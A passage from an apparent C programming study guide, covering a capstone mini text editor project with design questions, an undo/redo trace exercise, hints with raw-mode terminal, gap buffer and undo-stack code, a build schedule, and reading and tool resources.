What is a VT100/ANSI terminal? - *Resource:* [ANSI Escape Codes](https://en.wikipedia.org/wiki/ANSI_escape_code) 3. **Text Buffer Data Structures** - **Array of lines**: Simple but slow for long lines - **Gap buffer**: Fast insertions at cursor, used by many editors - **Piece table**: What VS Code uses - **Rope**: For very large files - *Resource:* "Text Editor Data Structures" - various blog posts and papers 4. **Undo/Redo Models** - Command pattern: Store operations, not state - Snapshot: Store full state at each change (memory intensive) - Delta: Store diffs (complex but efficient) - How do you implement branching undo (like Vim's undo tree)? --- ### Questions to Guide Your Design **Before implementing, think through these:** 1. **Buffer Representation** - How will you represent the text in memory? - Array of strings (lines)? One big gap buffer? Linked list of lines? - What happens when the user inserts in the middle of a 10,000 character line? - What happens when the file has 100,000 lines? 2. **Screen Rendering** - How do you map buffer positions to screen positions? - What if a line is longer than the screen width? - How do you handle scrolling efficiently? - Do you redraw the whole screen or just what changed? 3. **Undo/Redo Stack** - What do you store in the undo stack? Full file? Just the change? - When do you add to the stack? Every character? Every "word"? - What happens to the redo stack when the user types after undo? - How do you prevent the undo stack from consuming infinite memory? 4. **File I/O** - How do you load a file into your buffer? - How do you save? Overwrite directly or write to temp first? - What about the "modified" flag? When do you show "unsaved changes"? 5. **Memory Ownership** - Who owns each line's memory? - When you undo a deletion, do you restore the original pointer or make a copy? - How do you ensure no leaks after 1000 undo/redo cycles? --- ### Thinking Exercise: Trace the Operations Walk through these operations on paper: ``` 1. Open file "test.txt" containing: Line 1: "Hello World" Line 2: "Goodbye World" 2. Cursor is at start of file 3. Move cursor to position 6 (after "Hello ") 4. Type "Beautiful " 5. Text is now: "Hello Beautiful World" 6. Press Ctrl-Z (undo) 7. Text is now: "Hello World" 8. Type "Cruel " 9. Text is now: "Hello Cruel World" 10. Press Ctrl-Z 11. Press Ctrl-Z again ``` *Questions:* - What does your buffer look like after each step? - What's in your undo stack after step 5? After step 8? - What's in your redo stack after step 7? After step 9? - What memory allocations and frees happen at each step? - What does the final undo (step 11) produce? --- ### The Interview Questions They'll Ask Prepare to answer these: 1. "What data structure would you use to represent text in an editor? Why?" 2. "How would you implement undo/redo?" 3. "How do you handle terminal input in raw mode?" 4. "What happens if the user opens a 1GB file?" 5. "How would you search for text efficiently in a large file?" 6. "How do you ensure your editor doesn't leak memory over time?" --- ### Hints in Layers (Only If Stuck)
Hint 1: Follow the Kilo Tutorial The [Kilo tutorial](https://viewsourcecode.org/snaptoken/kilo/) by Antirez (Redis creator) is excellent. It walks through building a minimal editor step-by-step. Start here, then add your own features.
Hint 2: Raw Mode Basics ```c #include #include struct termios orig_termios; void enableRawMode() { tcgetattr(STDIN_FILENO, &orig_termios); struct termios raw = orig_termios; raw.c_lflag &= ~(ECHO | ICANON | ISIG); // No echo, char-by-char, no signals raw.c_iflag &= ~(IXON | ICRNL); // No Ctrl-S/Q, fix Ctrl-M tcsetattr(STDIN_FILENO, TCSAFLUSH, &raw); } void disableRawMode() { tcsetattr(STDIN_FILENO, TCSAFLUSH, &orig_termios); } ``` Call `disableRawMode()` on exit or the terminal will be broken! </details>
Hint 3: Simple Gap Buffer A gap buffer keeps a "gap" at the cursor position: ``` "Hello World" ^cursor In memory: ['H','e','l','l','o',' ',GAP,GAP,GAP,GAP,'W','o','r','l','d'] ^gap_start ^gap_end To insert 'X': put 'X' at gap_start, increment gap_start To delete: just move gap boundaries To move cursor: shift text across the gap ``` ![Gap Buffer Data Structure](assets/gap_buffer.jpg) Insertions at cursor are O(1). Moving cursor is O(n) in worst case but typically small.
Hint 4: Simple Undo Stack ```c typedef enum { INSERT, DELETE } ActionType; typedef struct { ActionType type; int pos; // Where the action occurred char* text; // The text that was inserted/deleted int len; // Length of text } UndoAction; // To undo INSERT: delete the text at pos // To undo DELETE: insert the text at pos // Push to undo stack on each edit // On undo: pop from undo stack, perform reverse, push to redo stack ```
Hint 5: Escape Sequence Basics ```c // Clear screen write(STDOUT_FILENO, "\x1b[2J", 4); // Move cursor to position (row, col) - 1-indexed char buf[32]; snprintf(buf, sizeof(buf), "\x1b[%d;%dH", row, col); write(STDOUT_FILENO, buf, strlen(buf)); // Hide cursor write(STDOUT_FILENO, "\x1b[?25l", 6); // Show cursor write(STDOUT_FILENO, "\x1b[?25h", 6); ```
--- ### Progressive Build Order Build in this order for maximum learning: 1. **Week 1: Terminal I/O** - Raw mode and reading keypresses - Printing to screen at specific positions - Cursor movement with arrow keys - Just display a static message and move cursor around 2. **Week 2: Text Display** - Load a file into an array of strings - Display it on screen with scrolling - Move cursor through the document - No editing yet—just viewing 3. **Week 3: Editing** - Insert characters at cursor - Delete with backspace - Insert new lines with Enter - Save to file 4. **Week 4: Undo/Redo** - Track changes - Implement undo - Implement redo - Test with AddressSanitizer 5. **Week 5+: Polish** - Search (Ctrl-F) - Syntax highlighting (if ambitious) - Line numbers - Status bar --- ### Books That Will Help | Topic | Book | Chapter | |-------|------|---------| | Terminal programming | "Advanced Programming in the UNIX Environment" | Ch. 18 | | Data structures | "Data Structures and Algorithms" | Relevant chapters | | C systems programming | "The C Programming Language" | All of it | | Memory management | "Understanding and Using C Pointers" | Ch. 1-4 | | UNIX I/O | "The Linux Programming Interface" | Ch. 4-5, 62 | --- ## Summary | # | Project | Main Language | |---|---------|---------------| | 1 | Memory Inspector Tool | C | | 2 | Safe String Library | C | | 3 | Memory Leak Detector | C | | 4 | Arena Allocator | C | | 5 | Exploit Lab (Buffer Overflow Playground) | C | | **Capstone** | Mini Text Editor | C | --- ## Resources ### Books - **Computer Systems: A Programmer's Perspective** - Bryant & O'Hallaron (the definitive guide) - **The C Programming Language** - Kernighan & Ritchie (the classic) - **Understanding and Using C Pointers** - Richard Reese (pointer mastery) - **C Interfaces and Implementations** - David Hanson (advanced patterns) - **Hacking: The Art of Exploitation** - Jon Erickson (security perspective) ### Online Resources - [Understanding and Using C Pointers - O'Reilly](https://www.oreilly.com/library/view/understanding-and-using/9781449344535/) - [LLDB Tutorial - Official LLVM Documentation](https://lldb.llvm.org/use/tutorial.html) - [PDR: LLDB Tutorial - Aaron Bloomfield](https://aaronbloomfield.github.io/pdr/tutorials/02-lldb/index.html) - [Memory Allocators 101 - Arjun Sreedharan](https://arjunsreedharan.org/post/148675821737/memory-allocators-101-write-a-simple-memory) - [malloc() from Scratch - Tenzin Migmar](https://medium.com/@tenzinmigmar/malloc-from-scratch-dbc1bc23dfde) - [Master memory management - 42 Studio](https://medium.com/a-42-journey/how-to-create-your-own-malloc-library-b86fedd39b96) - [Dancing in the Debugger - objc.io](https://www.objc.io/issues/19-debugging/lldb-debugging/) - [Demystifying malloc - DEV Community](https://dev.to/_0xsegfault/demystifying-malloc-build-your-own-memory-allocator-in-c-1ao9) - [Kilo Text Editor Tutorial](https://viewsourcecode.org/snaptoken/kilo/) ### Tools Documentation - [LLVM AddressSanitizer](https://clang.llvm.org/docs/AddressSanitizer.html) - Compile-time memory bug detection - [Valgrind](https://valgrind.org/docs/manual/mc-manual.html) - Runtime memory analysis - [GDB Documentation](https://sourceware.org/gdb/current/onlinedocs/gdb/) - The GNU Debugger --- **Total Estimated Time**: 4-6 weeks of focused study **After completion**: You will understand memory at the level that separates "programmers who use C" from "programmers who think in C." You'll be able to debug memory issues that mystify others, write code that's both fast and safe, and understand why modern languages like Rust were designed the way they were.